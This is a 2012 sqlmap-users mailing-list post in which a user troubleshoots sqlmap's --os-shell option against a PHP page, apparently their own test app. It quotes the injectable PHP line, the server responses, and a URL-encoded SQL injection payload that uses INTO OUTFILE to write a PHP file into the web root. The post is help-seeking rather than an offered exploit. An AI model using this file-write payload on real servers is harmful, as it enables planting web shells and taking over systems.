Hello there,
i just get a problem when i use the --os-shell command.english is not my mother
languag.But i will try my best to explain the situation.
when i use the default --os-shell payload ,it does not work.the server respose
is
HTTP/1.1 200 OK
Date: Mon, 17 Dec 2012 11:42:34 GMT
Server: Apache/2.2.16 (Debian)
X-Powered-By: PHP/5.3.3-7+squeeze14
Vary: Accept-Encoding
Content-Length: 1858
Content-Type: text/html
and a error message in the page :
Notice: Undefined index: id in /var/www/cat.php on line 6
the 6th line in my cat.php is :
<?php
require "header.php";
$pics = Picture:all ($_GET["id"]); ------the sixth line.
but if i shorten the payload .just like
1%20LIMIT%201%20INTO%20OUTFILE%20'/var/www/tmpuyvgq.php'%20LINES%20TERMINATED%20BY%200x3c3f7068700a696620286973737d3f3e0a%20--
this payload would work.the file is written .and the server response :
Mon, 17 Dec 2012 12:02:17 GMT
Server: Apache/2.2.16 (Debian)
X-Powered-By: PHP/5.3.3-7+squeeze14
Vary: Accept-Encoding
Content-Length: 1211
Content-Type: text/html
also with an error message:
Warning: mysql_fetch_assoc() expects parameter 1 to be resource, boolean
given in /var/www/classes/picture.php on line 22
i thougth maybe the length of the url is too long .maybe there is some
error in my php conf.but i thought the default should works on all kinds
of situation.i could not figure out the problem.
thanks everyone.
by the way. i could not receive the mailing list content.i dont know if
you can receive this email.
------------------------------------------------------------------------------
LogMeIn Rescue: Anywhere, Anytime Remote support for IT. Free Trial
Remotely access PCs and mobile devices and provide instant support
Improve your efficiency, and focus on delivering more value-add services
Discover what IT Professionals Know. Rescue delivers
http://p.sf.net/sfu/logmein_12329d2d
_______________________________________________
sqlmap-users mailing list
sqlmap-users@lists.sourceforge.net
https://lists.sourceforge.net/lists/listinfo/sqlmap-users
